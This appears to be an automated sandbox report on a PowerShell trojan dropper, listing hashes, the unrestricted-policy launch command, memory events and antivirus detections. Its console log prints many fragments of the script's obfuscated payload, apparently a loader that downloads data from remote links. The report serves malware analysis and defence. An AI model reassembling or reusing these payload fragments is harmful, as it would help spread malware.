Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 4, 2024, 10 a.m.	July 4, 2024, 10:02 a.m.

Size	13.6KB
Type	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
MD5	`8c1b03a6197614eeeb38e25f24e910b7`
SHA256	`dfc9c3a66a66ca9a0ad45d6388a64a753e40369e174e76552c4050db3de0d145`
CRC32	`E45AA2D4`
ssdeep	`384:FUQMMF22kir/WU/noMdVCOMmbHJBH1U3JBH1UKKCK3dUccqRx/p9Spfd+mohNUcb:FpVr4SZtLKgbAG2e3jltnxwVGHM/y`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\file_2n4kbwex.dbr.txt.ps1
2576

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 147 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 4, 2024, 10 a.m.	buffer: Ampersand not allowed. The & operator is reserved for future use; use "&" to pa console_handle: 0x00000023	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: ss ampersand as a string. console_handle: 0x0000002f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\file_2n4kbwex.dbr.txt.ps1:4 char:25 console_handle: 0x0000003b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: + symphonizar = "" & <<<< comistura & tyrosina & comistura & "gB1DgTreG4 console_handle: 0x00000047	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQ console_handle: 0x00000053	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: BkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreI console_handle: 0x0000005f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMD console_handle: 0x0000006b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawB console_handle: 0x00000077	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: zDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & comistura & tyrosina & comistura & "QB console_handle: 0x00000083	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: iDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & co console_handle: 0x0000008f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: mistura & tyrosina & comistura & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & comistura console_handle: 0x0000009b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: & tyrosina & comistura & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQ console_handle: 0x000000a7	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DgTreuDgTreE4DgTre" & comistura & tyrosina & comistura & "QB0DgTreC4DgTreVwBlDg console_handle: 0x000000b3	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: TreGIDgTreQwBsDgTreGkDgTre" & comistura & tyrosina & comistura & "QBuDgTreHQDgT console_handle: 0x000000bf	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: reOwDgTregDgTreCQDgTre" & comistura & tyrosina & comistura & "DgTreBvDgTreHcDgT console_handle: 0x000000cb	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: rebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & comistura & tyrosina & comistura & "DgTre console_handle: 0x000000d7	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: BEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTre console_handle: 0x000000e3	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & comistura & tyrosina & c console_handle: 0x000000ef	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: omistura & "gBsDgTreGUDgTre" & comistura & tyrosina & comistura & "DgTreBMDgTre console_handle: 0x000000fb	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: GkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTr console_handle: 0x00000107	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: eHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTr console_handle: 0x00000113	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: ebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebg console_handle: 0x0000011f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: BrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & c console_handle: 0x0000012b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: omistura & tyrosina & comistura & "gBvDgTreHIDgTre" & comistura & tyrosina & co console_handle: 0x00000137	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: mistura & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTre console_handle: 0x00000143	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: CDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTr console_handle: 0x0000014f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: eGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgT console_handle: 0x0000015b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: reHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreG console_handle: 0x00000167	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: QDgTre" & comistura & tyrosina & comistura & "QBkDgTreEQDgTreYQB0DgTreGEDgTreID console_handle: 0x00000173	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTre" & comistura & tyrosina & comist console_handle: 0x0000017f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: ura & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTreb console_handle: 0x0000018b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTr console_handle: 0x00000197	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: eGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgT console_handle: 0x000001a3	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: reCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDg console_handle: 0x000001af	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: TreH0DgTreOwDgTregDgTreHIDgTre" & comistura & tyrosina & comistura & "QB0DgTreH console_handle: 0x000001bb	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: UDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTre" console_handle: 0x000001c7	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: & comistura & tyrosina & comistura & "QBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9D console_handle: 0x000001d3	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBD console_handle: 0x000001df	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTreaQBhDgT console_handle: 0x000001eb	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: reDgDgTreMDgTreDgTrezDgTreDQDgTreMDgTreDgTre1DgTreC4DgTredQBzDgTreC4DgTreYQByDg console_handle: 0x000001f7	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: TreGMDgTreaDgTreBpDgTreHYDgTre" & comistura & tyrosina & comistura & "QDgTreuDg console_handle: 0x00000203	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: TreG8DgTrecgBnDgTreC8DgTreMQDgTre2DgTreC8DgTreaQB0DgTreGUDgTrebQBzDgTreC8DgTreb console_handle: 0x0000020f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwDgTreyDgTreDDgTreDgTreMgDgTre0 console_handle: 0x0000021b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DgTreDDgTreDgTreNgDgTrevDgTreG4DgTre" & comistura & tyrosina & comistura & "QB3 console_handle: 0x00000227	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: DgTreF8DgTreaQBtDgTreGEDgTre" & comistura & tyrosina & comistura & "wBlDgTreC4D console_handle: 0x00000233	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTreagBwDgTreGcDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTr console_handle: 0x0000023f	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: eOgDgTrevDgTreC8DgTreaQBhDgTreDgDgTreMDgTreDgTrezDgTreDQDgTreMDgTreDgTre1DgTreC console_handle: 0x0000024b	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: 4DgTredQBzDgTreC4DgTreYQByDgTreGMDgTreaDgTreBpDgTreHYDgTre" & comistura & tyros console_handle: 0x00000257	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: ina & comistura & "QDgTreuDgTreG8DgTrecgBnDgTreC8DgTreMQDgTre2DgTreC8DgTreaQB0D console_handle: 0x00000263	1	1
WriteConsoleW July 4, 2024, 10 a.m.	buffer: gTreGUDgTrebQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwDg console_handle: 0x0000026f	1	1

Uses Windows APIs to generate a cryptographic key (4 events)

Time & API	Arguments	Status	Return
CryptExportKey July 4, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ac678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ac678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b79e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b79e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Allocates read-write-execute memory (usually to unpack itself) (18 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05892000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05893000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Lionic	Trojan.Script.Valyria.4!c
Skyhigh	BehavesLike.VBS.Dropper.lv
VIPRE	VB:Trojan.Valyria.8799
Arcabit	VB:Trojan.Valyria.D225F
Symantec	Scr.Malcode!gen
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VB:Trojan.Valyria.8799
MicroWorld-eScan	VB:Trojan.Valyria.8799
Emsisoft	VB:Trojan.Valyria.8799 (B)
FireEye	VB:Trojan.Valyria.8799
Ikarus	Trojan.VBS.Agent
Google	Detected
Kingsoft	Script.Trojan.Generic.a
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	VB:Trojan.Valyria.8799
Varist	ABTrojan.IUSZ-
MAX	malware (ai score=86)
alibabacloud	Trojan:Multi/Valyria.Gen

file_2n4kbwex.dbr.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All